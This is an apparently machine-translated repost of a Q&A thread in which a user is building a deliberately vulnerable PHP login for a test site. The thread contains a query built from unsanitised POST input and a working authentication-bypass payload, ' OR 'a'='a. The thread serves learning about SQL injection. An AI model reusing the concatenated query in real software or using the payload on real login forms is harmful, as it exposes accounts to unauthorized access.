[英]How do I make my test website vulnerable to SQL injection?
这是我的login.php代码的片段:
if (isset($_POST['login'])){
$username = $_POST['user'];
$password = $_POST['pass'];
$query = mysqli_query($con, "SELECT * FROM users WHERE password='$password' and username='$username'");
$row = mysqli_fetch_array($query);
if ($row > 0) {
$_SESSION['user_id']=$row['user_id'];
header('location:home.php');
} else {
echo 'Invalid Username and Password Combination';
}
}
?>
登录有效,但是当我尝试通过输入'或'='绕过身份验证/登录时,将返回此错误
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in C:\x\x\x\x.php on line 32
当我输入数据库中的有效用户时,登录有效:示例
Username: admin
Password: admin
我想做的是通过输入(SQL注入)绕过登录
Username: admin
Password: **' ANYTHING ''='**
但是然后输入' ANYTHING ''='
返回上述错误。
之所以收到该警告,是因为您注入的值导致查询失败,这可能是由于MySQL语法错误所致。
请尝试以下值:
$password = "' OR 'a'='a";
$username = "admin";
这将给出SQL字符串:
SELECT * FROM users WHERE password='' OR 'a'='a' and username='admin'
哪个应该有效并返回管理员用户记录。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.